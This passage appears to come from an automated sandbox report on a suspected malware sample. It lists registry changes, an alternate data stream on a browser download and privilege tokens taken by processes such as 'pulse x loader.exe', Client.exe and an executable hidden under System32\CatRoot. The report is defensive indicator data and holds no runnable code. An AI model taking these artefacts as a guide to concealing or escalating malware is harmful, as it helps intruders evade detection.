| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3270530367-132075249-2153716227-1000\{F64B64BB-6490-4009-870B-B33E80404548} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3270530367-132075249-2153716227-1000\{EF036A7F-AF11-4345-9CC7-CE811E68EF8D} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133534299895306274" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 992739.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cvtresa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
